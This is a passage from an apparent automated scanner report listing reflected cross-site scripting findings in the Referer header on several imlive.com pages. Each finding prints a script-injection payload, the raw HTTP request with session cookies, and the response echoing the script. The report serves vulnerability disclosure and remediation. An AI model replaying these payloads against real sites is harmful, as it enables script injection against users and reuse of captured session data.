Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forgot.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=1365d'-alert(1)-'8c7ad16a976

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:38 GMT
Connection: close
Content-Length: 3308
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Imlive.com Customer Serv
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/forgot.aspx&he=imlive.com&ul=/forgot.aspx&rf=http://www.google.com/search?hl=en^q=1365d'-alert(1)-'8c7ad16a976&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.202. http://imlive.com/forgot.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /forgot.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f31f'-alert(1)-'d8c094b7adb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forgot.aspx HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=9f31f'-alert(1)-'d8c094b7adb

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:47 GMT
Connection: close
Content-Length: 3308
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Imlive.com Customer Serv
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/forgot.aspx&he=imlive.com&ul=/forgot.aspx&rf=http://www.google.com/search?hl=en^q=9f31f'-alert(1)-'d8c094b7adb&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.203. http://imlive.com/homepagems3.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /homepagems3.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e3d10'><script>alert(1)</script>76788ffdb68 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /homepagems3.asp HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000
Referer: http://www.google.com/search?hl=en&q=e3d10'><script>alert(1)</script>76788ffdb68

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:05:14 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2BBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2FLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3D; expires=Sat, 03-May-2008 14:05:14 GMT; path=/
Set-Cookie: ix=k; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
Set-Cookie: ASPSESSIONIDCARBBRTR=OFAEMBCBCGCOCIDCNNFPADIH; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:05:15 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 10285


<html>
   <head>
       
<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/headerguest.css" />

<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/hostbasic.c
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/homepagems3.asp&lr=1107816009&ud=0&pe=homepagems3.asp&rf=http://www.google.com/search?hl=en^q=e3d10'><script>alert(1)</script>76788ffdb68&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

2.204. http://imlive.com/hostmembers.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /hostmembers.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 39448'><script>alert(1)</script>4985a3648d9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /hostmembers.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=39448'><script>alert(1)</script>4985a3648d9

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:14:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:16 GMT
Connection: close
Content-Length: 10795
Vary: Accept-Encoding


<HTML>
   <HEAD>
       
       <TITLE>ImLive - Host Login</TITLE>
       
       <meta name="description" content="Welcome, ImLive Hosts. Please login to live video chat about everything from friendship and romance
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/login.asp?host&lr=1107816009&ud=0&pe=login.asp&rf=http://www.google.com/search?hl=en^q=39448'><script>alert(1)</script>4985a3648d9&qs=host&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

2.205. http://imlive.com/live-sex-chats/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9543d'-alert(1)-'3fbf0fbae6a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=9543d'-alert(1)-'3fbf0fbae6a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:05 GMT
Connection: close
Content-Length: 39949
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/category.aspx&he=imlive.com&ul=/live-sex-chats/&rf=http://www.google.com/search?hl=en^q=9543d'-alert(1)-'3fbf0fbae6a&qs=cat=1&qs=cat=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent
...[SNIP]...

2.206. http://imlive.com/live-sex-chats/adult-shows/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/adult-shows/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd2e5'-alert(1)-'83f3da1d0da was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/adult-shows/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=dd2e5'-alert(1)-'83f3da1d0da

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:41 GMT
Connection: close
Content-Length: 25196
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
"text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/bt/btguest.aspx&he=imlive.com&ul=/live-sex-chats/adult-shows/&rf=http://www.google.com/search?hl=en^q=dd2e5'-alert(1)-'83f3da1d0da&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.207. http://imlive.com/live-sex-chats/cam-girls/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/cam-girls/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50e28'-alert(1)-'4ef9bdb79a0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/cam-girls/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=50e28'-alert(1)-'4ef9bdb79a0

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:23 GMT
Connection: close
Content-Length: 224507
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ype="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=50e28'-alert(1)-'4ef9bdb79a0&qs=cat=1^roomid=10&qs=cat=1^roomid=10&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

2.208. http://imlive.com/live-sex-chats/cam-girls/categories/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/cam-girls/categories/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15c00'-alert(1)-'13ed03de9eb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/cam-girls/categories/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=15c00'-alert(1)-'13ed03de9eb

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:34 GMT
Connection: close
Content-Length: 27209
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
cript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/category_sub.aspx&he=imlive.com&ul=/live-sex-chats/cam-girls/categories/&rf=http://www.google.com/search?hl=en^q=15c00'-alert(1)-'13ed03de9eb&qs=roomid=10&qs=roomid=10&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.att
...[SNIP]...

2.209. http://imlive.com/live-sex-chats/cam-girls/hotspots/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/cam-girls/hotspots/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abdb3'-alert(1)-'17f2cec9909 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

